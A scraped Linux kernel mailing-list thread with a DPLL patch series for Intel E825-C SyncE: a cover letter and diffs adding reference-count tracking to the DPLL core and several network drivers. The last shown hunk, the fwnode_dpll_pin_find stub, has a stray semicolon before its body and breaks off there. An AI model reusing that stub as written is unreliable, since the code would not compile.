EXPORT_SYMBOL_GPL(dpll_pin_get); void dpll_pin_put(struct dpll_pin *pin) { mutex_lock(&dpll_lock); - if (refcount_dec_and_test(&pin->refcount)) { - xa_erase(&dpll_pin_xa, pin->id); - xa_destroy(&pin->dpll_refs); - xa_destroy(&pin->parent_refs); - xa_destroy(&pin->ref_sync_pins); - dpll_pin_prop_free(&pin->prop); - fwnode_handle_put(pin->fwnode); - dpll_pin_idx_free(pin->pin_idx); - kfree_rcu(pin, rcu); - } + __dpll_pin_put(pin); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -740,8 +769,8 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { + __dpll_pin_hold(pin); ret = pin; - refcount_inc(&ret->refcount); break; } } @@ -893,7 +922,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, ret = dpll_xa_ref_pin_add(&pin->parent_refs, parent, ops, priv, pin); if (ret) goto unlock; - refcount_inc(&pin->refcount); xa_for_each(&parent->dpll_refs, i, ref) { ret = __dpll_pin_register(ref->dpll, pin, ops, priv, parent); if (ret) { @@ -913,7 +941,6 @@ int dpll_pin_on_pin_register(struct dpll_pin *parent, struct dpll_pin *pin, parent); dpll_pin_delete_ntf(pin); } - refcount_dec(&pin->refcount); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); unlock: mutex_unlock(&dpll_lock); @@ -940,7 +967,6 @@ void dpll_pin_on_pin_unregister(struct dpll_pin *parent, struct dpll_pin *pin, mutex_lock(&dpll_lock); dpll_pin_delete_ntf(pin); dpll_xa_ref_pin_del(&pin->parent_refs, parent, ops, priv, pin); - refcount_dec(&pin->refcount); xa_for_each(&pin->dpll_refs, i, ref) __dpll_pin_unregister(ref->dpll, pin, ops, priv, parent); mutex_unlock(&dpll_lock); -- 2.52.0
{ "author": "Ivan Vecera <ivecera@redhat.com>", "date": "Mon, 2 Feb 2026 18:16:35 +0100", "thread_id": "20260202171638.17427-6-ivecera@redhat.com.mbox.gz" }
lkml
[PATCH net-next v4 0/9] dpll: Core improvements and ice E825-C SyncE support
This series introduces Synchronous Ethernet (SyncE) support for the Intel E825-C Ethernet controller. Unlike previous generations where DPLL connections were implicitly assumed, the E825-C architecture relies on the platform firmware (ACPI) to describe the physical connections between the Ethernet controller and external DPLLs (such as the ZL3073x). To accommodate this, the series extends the DPLL subsystem to support firmware node (fwnode) associations, asynchronous discovery via notifiers, and dynamic pin management. Additionally, a significant refactor of the DPLL reference counting logic is included to ensure robustness and debuggability. DPLL Core Extensions: * Firmware Node Association: Pins can now be associated with a struct fwnode_handle after allocation via dpll_pin_fwnode_set(). This allows drivers to link pin objects with their corresponding DT/ACPI nodes. * Asynchronous Notifiers: A raw notifier chain is added to the DPLL core. This allows the Ethernet driver to subscribe to events and react when the platform DPLL driver registers the parent pins, resolving probe ordering dependencies. * Dynamic Indexing: Drivers can now request DPLL_PIN_IDX_UNSPEC to have the core automatically allocate a unique pin index. Reference Counting & Debugging: * Refactor: The reference counting logic in the core is consolidated. Internal list management helpers now automatically handle hold/put operations, removing fragile open-coded logic in the registration paths. * Reference Tracking: A new Kconfig option DPLL_REFCNT_TRACKER is added. This allows developers to instrument and debug reference leaks by recording stack traces for every get/put operation. Driver Updates: * zl3073x: Updated to associate pins with fwnode handles using the new setter and support the 'mux' pin type. * ice: Implements the E825-C specific hardware configuration for SyncE (CGU registers). It utilizes the new notifier and fwnode APIs to dynamically discover and attach to the platform DPLLs. Patch Summary: Patch 1: DPLL Core (fwnode association). Patch 2: Driver zl3073x (Set fwnode). Patch 3-4: DPLL Core (Notifiers and dynamic IDs). Patch 5: Driver zl3073x (Mux type). Patch 6: DPLL Core (Refcount refactor). Patch 7-8: Refcount tracking infrastructure and driver updates. Patch 9: Driver ice (E825-C SyncE logic). Changes in v4: * Fixed documentation and function stub issues found by AI Arkadiusz Kubalewski (1): ice: dpll: Support E825-C SyncE and dynamic pin discovery Ivan Vecera (7): dpll: Allow associating dpll pin with a firmware node dpll: zl3073x: Associate pin with fwnode handle dpll: Support dynamic pin index allocation dpll: zl3073x: Add support for mux pin type dpll: Enhance and consolidate reference counting logic dpll: Add reference count tracking support drivers: Add support for DPLL reference count tracking Petr Oros (1): dpll: Add notifier chain for dpll events drivers/dpll/Kconfig | 15 + drivers/dpll/dpll_core.c | 288 ++++++- drivers/dpll/dpll_core.h | 11 + drivers/dpll/dpll_netlink.c | 6 + drivers/dpll/zl3073x/dpll.c | 15 +- drivers/dpll/zl3073x/dpll.h | 2 + drivers/dpll/zl3073x/prop.c | 2 + drivers/net/ethernet/intel/ice/ice_dpll.c | 755 +++++++++++++++--- drivers/net/ethernet/intel/ice/ice_dpll.h | 30 + drivers/net/ethernet/intel/ice/ice_lib.c | 3 + drivers/net/ethernet/intel/ice/ice_ptp.c | 32 + drivers/net/ethernet/intel/ice/ice_ptp_hw.c | 9 +- drivers/net/ethernet/intel/ice/ice_tspll.c | 217 +++++ drivers/net/ethernet/intel/ice/ice_tspll.h | 13 +- drivers/net/ethernet/intel/ice/ice_type.h | 6 + .../net/ethernet/mellanox/mlx5/core/dpll.c | 16 +- drivers/ptp/ptp_ocp.c | 18 +- include/linux/dpll.h | 59 +- 18 files changed, 1347 insertions(+), 150 deletions(-) -- 2.52.0
Add support for the REF_TRACKER infrastructure to the DPLL subsystem. When enabled, this allows developers to track and debug reference counting leaks or imbalances for dpll_device and dpll_pin objects. It records stack traces for every get/put operation and exposes this information via debugfs at: /sys/kernel/debug/ref_tracker/dpll_device_* /sys/kernel/debug/ref_tracker/dpll_pin_* The following API changes are made to support this: 1. dpll_device_get() / dpll_device_put() now accept a 'dpll_tracker *' (which is a typedef to 'struct ref_tracker *' when enabled, or an empty struct otherwise). 2. dpll_pin_get() / dpll_pin_put() and fwnode_dpll_pin_find() similarly accept the tracker argument. 3. Internal registration structures now hold a tracker to associate the reference held by the registration with the specific owner. All existing in-tree drivers (ice, mlx5, ptp_ocp, zl3073x) are updated to pass NULL for the new tracker argument, maintaining current behavior while enabling future debugging capabilities. Reviewed-by: Aleksandr Loktionov <aleksandr.loktionov@intel.com> Co-developed-by: Petr Oros <poros@redhat.com> Signed-off-by: Petr Oros <poros@redhat.com> Signed-off-by: Ivan Vecera <ivecera@redhat.com> --- v4: * added missing tracker parameter to fwnode_dpll_pin_find() stub v3: * added Kconfig dependency on STACKTRACE_SUPPORT and DEBUG_KERNEL --- drivers/dpll/Kconfig | 15 +++ drivers/dpll/dpll_core.c | 98 ++++++++++++++----- drivers/dpll/dpll_core.h | 5 + drivers/dpll/zl3073x/dpll.c | 12 +-- drivers/net/ethernet/intel/ice/ice_dpll.c | 14 +-- .../net/ethernet/mellanox/mlx5/core/dpll.c | 13 +-- drivers/ptp/ptp_ocp.c | 15 +-- include/linux/dpll.h | 21 ++-- 8 files changed, 139 insertions(+), 54 deletions(-) diff --git a/drivers/dpll/Kconfig b/drivers/dpll/Kconfig index ade872c915ac6..be98969f040ab 100644 --- a/drivers/dpll/Kconfig +++ b/drivers/dpll/Kconfig @@ -8,6 +8,21 @@ menu "DPLL device support" config DPLL bool +config DPLL_REFCNT_TRACKER + bool "DPLL reference count tracking" + depends on DEBUG_KERNEL && STACKTRACE_SUPPORT && DPLL + select REF_TRACKER + help + Enable reference count tracking for DPLL devices and pins. + This helps debugging reference leaks and use-after-free bugs + by recording stack traces for each get/put operation. + + The tracking information is exposed via debugfs at: + /sys/kernel/debug/ref_tracker/dpll_device_* + /sys/kernel/debug/ref_tracker/dpll_pin_* + + If unsure, say N. + source "drivers/dpll/zl3073x/Kconfig" endmenu diff --git a/drivers/dpll/dpll_core.c b/drivers/dpll/dpll_core.c index f6ab4f0cad84d..627a5b39a0efd 100644 --- a/drivers/dpll/dpll_core.c +++ b/drivers/dpll/dpll_core.c @@ -41,6 +41,7 @@ struct dpll_device_registration { struct list_head list; const struct dpll_device_ops *ops; void *priv; + dpll_tracker tracker; }; struct dpll_pin_registration { @@ -48,6 +49,7 @@ struct dpll_pin_registration { const struct dpll_pin_ops *ops; void *priv; void *cookie; + dpll_tracker tracker; }; static int call_dpll_notifiers(unsigned long action, void *info) @@ -83,33 +85,68 @@ void dpll_pin_notify(struct dpll_pin *pin, unsigned long action) call_dpll_notifiers(action, &info); } -static void __dpll_device_hold(struct dpll_device *dpll) +static void dpll_device_tracker_alloc(struct dpll_device *dpll, + dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&dpll->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_device_tracker_free(struct dpll_device *dpll, + dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&dpll->refcnt_tracker, tracker); +#endif +} + +static void __dpll_device_hold(struct dpll_device *dpll, dpll_tracker *tracker) +{ + dpll_device_tracker_alloc(dpll, tracker); refcount_inc(&dpll->refcount); } -static void __dpll_device_put(struct dpll_device *dpll) +static void __dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { + dpll_device_tracker_free(dpll, tracker); if (refcount_dec_and_test(&dpll->refcount)) { ASSERT_DPLL_NOT_REGISTERED(dpll); WARN_ON_ONCE(!xa_empty(&dpll->pin_refs)); xa_destroy(&dpll->pin_refs); xa_erase(&dpll_device_xa, dpll->id); WARN_ON(!list_empty(&dpll->registration_list)); + ref_tracker_dir_exit(&dpll->refcnt_tracker); kfree(dpll); } } -static void __dpll_pin_hold(struct dpll_pin *pin) +static void dpll_pin_tracker_alloc(struct dpll_pin *pin, dpll_tracker *tracker) { +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_alloc(&pin->refcnt_tracker, tracker, GFP_KERNEL); +#endif +} + +static void dpll_pin_tracker_free(struct dpll_pin *pin, dpll_tracker *tracker) +{ +#ifdef CONFIG_DPLL_REFCNT_TRACKER + ref_tracker_free(&pin->refcnt_tracker, tracker); +#endif +} + +static void __dpll_pin_hold(struct dpll_pin *pin, dpll_tracker *tracker) +{ + dpll_pin_tracker_alloc(pin, tracker); refcount_inc(&pin->refcount); } static void dpll_pin_idx_free(u32 pin_idx); static void dpll_pin_prop_free(struct dpll_pin_properties *prop); -static void __dpll_pin_put(struct dpll_pin *pin) +static void __dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { + dpll_pin_tracker_free(pin, tracker); if (refcount_dec_and_test(&pin->refcount)) { xa_erase(&dpll_pin_xa, pin->id); xa_destroy(&pin->dpll_refs); @@ -118,6 +155,7 @@ static void __dpll_pin_put(struct dpll_pin *pin) dpll_pin_prop_free(&pin->prop); fwnode_handle_put(pin->fwnode); dpll_pin_idx_free(pin->pin_idx); + ref_tracker_dir_exit(&pin->refcnt_tracker); kfree_rcu(pin, rcu); } } @@ -191,7 +229,7 @@ dpll_xa_ref_pin_add(struct xarray *xa_pins, struct dpll_pin *pin, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -214,7 +252,7 @@ static int dpll_xa_ref_pin_del(struct xarray *xa_pins, struct dpll_pin *pin, if (WARN_ON(!reg)) return -EINVAL; list_del(&reg->list); - __dpll_pin_put(pin); + __dpll_pin_put(pin, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_pins, i); @@ -272,7 +310,7 @@ dpll_xa_ref_dpll_add(struct xarray *xa_dplls, struct dpll_device *dpll, reg->ops = ops; reg->priv = priv; reg->cookie = cookie; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); if (ref_exists) refcount_inc(&ref->refcount); list_add_tail(&reg->list, &ref->registration_list); @@ -295,7 +333,7 @@ dpll_xa_ref_dpll_del(struct xarray *xa_dplls, struct dpll_device *dpll, if (WARN_ON(!reg)) return; list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (refcount_dec_and_test(&ref->refcount)) { xa_erase(xa_dplls, i); @@ -337,6 +375,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) return ERR_PTR(ret); } xa_init_flags(&dpll->pin_refs, XA_FLAGS_ALLOC); + ref_tracker_dir_init(&dpll->refcnt_tracker, 128, "dpll_device"); return dpll; } @@ -346,6 +385,7 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * @clock_id: clock_id of creator * @device_idx: idx given by device driver * @module: reference to registering module + * @tracker: tracking object for the acquired reference * * Get existing object of a dpll device, unique for given arguments. * Create new if doesn't exist yet. @@ -356,7 +396,8 @@ dpll_device_alloc(const u64 clock_id, u32 device_idx, struct module *module) * * ERR_PTR(X) - error */ struct dpll_device * -dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) +dpll_device_get(u64 clock_id, u32 device_idx, struct module *module, + dpll_tracker *tracker) { struct dpll_device *dpll, *ret = NULL; unsigned long index; @@ -366,13 +407,17 @@ dpll_device_get(u64 clock_id, u32 device_idx, struct module *module) if (dpll->clock_id == clock_id && dpll->device_idx == device_idx && dpll->module == module) { - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, tracker); ret = dpll; break; } } - if (!ret) + if (!ret) { ret = dpll_device_alloc(clock_id, device_idx, module); + if (!IS_ERR(ret)) + dpll_device_tracker_alloc(ret, tracker); + } + mutex_unlock(&dpll_lock); return ret; @@ -382,15 +427,16 @@ EXPORT_SYMBOL_GPL(dpll_device_get); /** * dpll_device_put - decrease the refcount and free memory if possible * @dpll: dpll_device struct pointer + * @tracker: tracking object for the acquired reference * * Context: Acquires a lock (dpll_lock) * Drop reference for a dpll device, if all references are gone, delete * dpll device object. */ -void dpll_device_put(struct dpll_device *dpll) +void dpll_device_put(struct dpll_device *dpll, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_device_put(dpll); + __dpll_device_put(dpll, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_device_put); @@ -452,7 +498,7 @@ int dpll_device_register(struct dpll_device *dpll, enum dpll_type type, reg->ops = ops; reg->priv = priv; dpll->type = type; - __dpll_device_hold(dpll); + __dpll_device_hold(dpll, &reg->tracker); first_registration = list_empty(&dpll->registration_list); list_add_tail(&reg->list, &dpll->registration_list); if (!first_registration) { @@ -492,7 +538,7 @@ void dpll_device_unregister(struct dpll_device *dpll, return; } list_del(&reg->list); - __dpll_device_put(dpll); + __dpll_device_put(dpll, &reg->tracker); kfree(reg); if (!list_empty(&dpll->registration_list)) { @@ -622,6 +668,7 @@ dpll_pin_alloc(u64 clock_id, u32 pin_idx, struct module *module, &dpll_pin_xa_id, GFP_KERNEL); if (ret < 0) goto err_xa_alloc; + ref_tracker_dir_init(&pin->refcnt_tracker, 128, "dpll_pin"); return pin; err_xa_alloc: xa_destroy(&pin->dpll_refs); @@ -683,6 +730,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); * @pin_idx: idx given by dev driver * @module: reference to registering module * @prop: dpll pin properties + * @tracker: tracking object for the acquired reference * * Get existing object of a pin (unique for given arguments) or create new * if doesn't exist yet. @@ -694,7 +742,7 @@ EXPORT_SYMBOL_GPL(unregister_dpll_notifier); */ struct dpll_pin * dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, - const struct dpll_pin_properties *prop) + const struct dpll_pin_properties *prop, dpll_tracker *tracker) { struct dpll_pin *pos, *ret = NULL; unsigned long i; @@ -704,13 +752,16 @@ dpll_pin_get(u64 clock_id, u32 pin_idx, struct module *module, if (pos->clock_id == clock_id && pos->pin_idx == pin_idx && pos->module == module) { - __dpll_pin_hold(pos); + __dpll_pin_hold(pos, tracker); ret = pos; break; } } - if (!ret) + if (!ret) { ret = dpll_pin_alloc(clock_id, pin_idx, module, prop); + if (!IS_ERR(ret)) + dpll_pin_tracker_alloc(ret, tracker); + } mutex_unlock(&dpll_lock); return ret; @@ -720,15 +771,16 @@ EXPORT_SYMBOL_GPL(dpll_pin_get); /** * dpll_pin_put - decrease the refcount and free memory if possible * @pin: pointer to a pin to be put + * @tracker: tracking object for the acquired reference * * Drop reference for a pin, if all references are gone, delete pin object. * * Context: Acquires a lock (dpll_lock) */ -void dpll_pin_put(struct dpll_pin *pin) +void dpll_pin_put(struct dpll_pin *pin, dpll_tracker *tracker) { mutex_lock(&dpll_lock); - __dpll_pin_put(pin); + __dpll_pin_put(pin, tracker); mutex_unlock(&dpll_lock); } EXPORT_SYMBOL_GPL(dpll_pin_put); @@ -752,6 +804,7 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); /** * fwnode_dpll_pin_find - find dpll pin by firmware node reference * @fwnode: reference to firmware node + * @tracker: tracking object for the acquired reference * * Get existing object of a pin that is associated with given firmware node * reference. @@ -761,7 +814,8 @@ EXPORT_SYMBOL_GPL(dpll_pin_fwnode_set); * * valid dpll_pin pointer on success * * NULL when no such pin exists */ -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker) { struct dpll_pin *pin, *ret = NULL; unsigned long index; @@ -769,7 +823,7 @@ struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode) mutex_lock(&dpll_lock); xa_for_each(&dpll_pin_xa, index, pin) { if (pin->fwnode == fwnode) { - __dpll_pin_hold(pin); + __dpll_pin_hold(pin, tracker); ret = pin; break; } diff --git a/drivers/dpll/dpll_core.h b/drivers/dpll/dpll_core.h index b7b4bb251f739..71ac88ef20172 100644 --- a/drivers/dpll/dpll_core.h +++ b/drivers/dpll/dpll_core.h @@ -10,6 +10,7 @@ #include <linux/dpll.h> #include <linux/list.h> #include <linux/refcount.h> +#include <linux/ref_tracker.h> #include "dpll_nl.h" #define DPLL_REGISTERED XA_MARK_1 @@ -23,6 +24,7 @@ * @type: type of a dpll * @pin_refs: stores pins registered within a dpll * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @registration_list: list of registered ops and priv data of dpll owners **/ struct dpll_device { @@ -33,6 +35,7 @@ struct dpll_device { enum dpll_type type; struct xarray pin_refs; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct list_head registration_list; }; @@ -48,6 +51,7 @@ struct dpll_device { * @ref_sync_pins: hold references to pins for Reference SYNC feature * @prop: pin properties copied from the registerer * @refcount: refcount + * @refcnt_tracker: ref_tracker directory for debugging reference leaks * @rcu: rcu_head for kfree_rcu() **/ struct dpll_pin { @@ -61,6 +65,7 @@ struct dpll_pin { struct xarray ref_sync_pins; struct dpll_pin_properties prop; refcount_t refcount; + struct ref_tracker_dir refcnt_tracker; struct rcu_head rcu; }; diff --git a/drivers/dpll/zl3073x/dpll.c b/drivers/dpll/zl3073x/dpll.c index 9eed21088adac..8788bcab7ec53 100644 --- a/drivers/dpll/zl3073x/dpll.c +++ b/drivers/dpll/zl3073x/dpll.c @@ -1480,7 +1480,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) /* Create or get existing DPLL pin */ pin->dpll_pin = dpll_pin_get(zldpll->dev->clock_id, index, THIS_MODULE, - &props->dpll_props); + &props->dpll_props, NULL); if (IS_ERR(pin->dpll_pin)) { rc = PTR_ERR(pin->dpll_pin); goto err_pin_get; @@ -1503,7 +1503,7 @@ zl3073x_dpll_pin_register(struct zl3073x_dpll_pin *pin, u32 index) return 0; err_register: - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); err_prio_get: pin->dpll_pin = NULL; err_pin_get: @@ -1534,7 +1534,7 @@ zl3073x_dpll_pin_unregister(struct zl3073x_dpll_pin *pin) /* Unregister the pin */ dpll_pin_unregister(zldpll->dpll_dev, pin->dpll_pin, ops, pin); - dpll_pin_put(pin->dpll_pin); + dpll_pin_put(pin->dpll_pin, NULL); pin->dpll_pin = NULL; } @@ -1708,7 +1708,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) dpll_mode_refsel); zldpll->dpll_dev = dpll_device_get(zldev->clock_id, zldpll->id, - THIS_MODULE); + THIS_MODULE, NULL); if (IS_ERR(zldpll->dpll_dev)) { rc = PTR_ERR(zldpll->dpll_dev); zldpll->dpll_dev = NULL; @@ -1720,7 +1720,7 @@ zl3073x_dpll_device_register(struct zl3073x_dpll *zldpll) zl3073x_prop_dpll_type_get(zldev, zldpll->id), &zl3073x_dpll_device_ops, zldpll); if (rc) { - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } @@ -1743,7 +1743,7 @@ zl3073x_dpll_device_unregister(struct zl3073x_dpll *zldpll) dpll_device_unregister(zldpll->dpll_dev, &zl3073x_dpll_device_ops, zldpll); - dpll_device_put(zldpll->dpll_dev); + dpll_device_put(zldpll->dpll_dev, NULL); zldpll->dpll_dev = NULL; } diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.c b/drivers/net/ethernet/intel/ice/ice_dpll.c index 53b54e395a2ed..64b7b045ecd58 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.c +++ b/drivers/net/ethernet/intel/ice/ice_dpll.c @@ -2814,7 +2814,7 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); } /** @@ -2840,7 +2840,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, for (i = 0; i < count; i++) { pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, - &pins[i].prop); + &pins[i].prop, NULL); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); goto release_pins; @@ -2851,7 +2851,7 @@ ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, release_pins: while (--i >= 0) - dpll_pin_put(pins[i].pin); + dpll_pin_put(pins[i].pin, NULL); return ret; } @@ -3037,7 +3037,7 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) if (WARN_ON_ONCE(!vsi || !vsi->netdev)) return; dpll_netdev_pin_clear(vsi->netdev); - dpll_pin_put(rclk->pin); + dpll_pin_put(rclk->pin, NULL); } /** @@ -3247,7 +3247,7 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) { if (cgu) dpll_device_unregister(d->dpll, d->ops, d); - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); } /** @@ -3271,7 +3271,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, u64 clock_id = pf->dplls.clock_id; int ret; - d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE); + d->dpll = dpll_device_get(clock_id, d->dpll_idx, THIS_MODULE, NULL); if (IS_ERR(d->dpll)) { ret = PTR_ERR(d->dpll); dev_err(ice_pf_to_dev(pf), @@ -3287,7 +3287,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ice_dpll_update_state(pf, d, true); ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { - dpll_device_put(d->dpll); + dpll_device_put(d->dpll, NULL); return ret; } d->ops = ops; diff --git a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c index 3ea8a1766ae28..541d83e5d7183 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/dpll.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/dpll.c @@ -438,7 +438,7 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, auxiliary_set_drvdata(adev, mdpll); /* Multiple mdev instances might share one DPLL device. */ - mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE); + mdpll->dpll = dpll_device_get(clock_id, 0, THIS_MODULE, NULL); if (IS_ERR(mdpll->dpll)) { err = PTR_ERR(mdpll->dpll); goto err_free_mdpll; @@ -451,7 +451,8 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, /* Multiple mdev instances might share one DPLL pin. */ mdpll->dpll_pin = dpll_pin_get(clock_id, mlx5_get_dev_index(mdev), - THIS_MODULE, &mlx5_dpll_pin_properties); + THIS_MODULE, &mlx5_dpll_pin_properties, + NULL); if (IS_ERR(mdpll->dpll_pin)) { err = PTR_ERR(mdpll->dpll_pin); goto err_unregister_dpll_device; @@ -479,11 +480,11 @@ static int mlx5_dpll_probe(struct auxiliary_device *adev, dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); err_put_dpll_pin: - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); err_unregister_dpll_device: dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); err_put_dpll_device: - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); err_free_mdpll: kfree(mdpll); return err; @@ -499,9 +500,9 @@ static void mlx5_dpll_remove(struct auxiliary_device *adev) destroy_workqueue(mdpll->wq); dpll_pin_unregister(mdpll->dpll, mdpll->dpll_pin, &mlx5_dpll_pins_ops, mdpll); - dpll_pin_put(mdpll->dpll_pin); + dpll_pin_put(mdpll->dpll_pin, NULL); dpll_device_unregister(mdpll->dpll, &mlx5_dpll_device_ops, mdpll); - dpll_device_put(mdpll->dpll); + dpll_device_put(mdpll->dpll, NULL); kfree(mdpll); mlx5_dpll_synce_status_set(mdev, diff --git a/drivers/ptp/ptp_ocp.c b/drivers/ptp/ptp_ocp.c index 65fe05cac8c42..f39b3966b3e8c 100644 --- a/drivers/ptp/ptp_ocp.c +++ b/drivers/ptp/ptp_ocp.c @@ -4788,7 +4788,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) devlink_register(devlink); clkid = pci_get_dsn(pdev); - bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE); + bp->dpll = dpll_device_get(clkid, 0, THIS_MODULE, NULL); if (IS_ERR(bp->dpll)) { err = PTR_ERR(bp->dpll); dev_err(&pdev->dev, "dpll_device_alloc failed\n"); @@ -4800,7 +4800,8 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) goto out; for (i = 0; i < OCP_SMA_NUM; i++) { - bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, &bp->sma[i].dpll_prop); + bp->sma[i].dpll_pin = dpll_pin_get(clkid, i, THIS_MODULE, + &bp->sma[i].dpll_prop, NULL); if (IS_ERR(bp->sma[i].dpll_pin)) { err = PTR_ERR(bp->sma[i].dpll_pin); goto out_dpll; @@ -4809,7 +4810,7 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) err = dpll_pin_register(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); if (err) { - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); goto out_dpll; } } @@ -4819,9 +4820,9 @@ ptp_ocp_probe(struct pci_dev *pdev, const struct pci_device_id *id) out_dpll: while (i--) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); out: ptp_ocp_detach(bp); out_disable: @@ -4842,11 +4843,11 @@ ptp_ocp_remove(struct pci_dev *pdev) for (i = 0; i < OCP_SMA_NUM; i++) { if (bp->sma[i].dpll_pin) { dpll_pin_unregister(bp->dpll, bp->sma[i].dpll_pin, &dpll_pins_ops, &bp->sma[i]); - dpll_pin_put(bp->sma[i].dpll_pin); + dpll_pin_put(bp->sma[i].dpll_pin, NULL); } } dpll_device_unregister(bp->dpll, &dpll_ops, bp); - dpll_device_put(bp->dpll); + dpll_device_put(bp->dpll, NULL); devlink_unregister(devlink); ptp_ocp_detach(bp); pci_disable_device(pdev); diff --git a/include/linux/dpll.h b/include/linux/dpll.h index 8fff048131f1d..5c80cdab0c180 100644 --- a/include/linux/dpll.h +++ b/include/linux/dpll.h @@ -18,6 +18,7 @@ struct dpll_device; struct dpll_pin; struct dpll_pin_esync; struct fwnode_handle; +struct ref_tracker; struct dpll_device_ops { int (*mode_get)(const struct dpll_device *dpll, void *dpll_priv, @@ -173,6 +174,12 @@ struct dpll_pin_properties { u32 phase_gran; }; +#ifdef CONFIG_DPLL_REFCNT_TRACKER +typedef struct ref_tracker *dpll_tracker; +#else +typedef struct {} dpll_tracker; +#endif + #define DPLL_DEVICE_CREATED 1 #define DPLL_DEVICE_DELETED 2 #define DPLL_DEVICE_CHANGED 3 @@ -205,7 +212,8 @@ size_t dpll_netdev_pin_handle_size(const struct net_device *dev); int dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev); -struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode); +struct dpll_pin *fwnode_dpll_pin_find(struct fwnode_handle *fwnode, + dpll_tracker *tracker); #else static inline void dpll_netdev_pin_set(struct net_device *dev, struct dpll_pin *dpll_pin) { } @@ -223,16 +231,17 @@ dpll_netdev_add_pin_handle(struct sk_buff *msg, const struct net_device *dev) } static inline struct dpll_pin * -fwnode_dpll_pin_find(struct fwnode_handle *fwnode) +fwnode_dpll_pin_find(struct fwnode_handle *fwnode, dpll_tracker *tracker); { 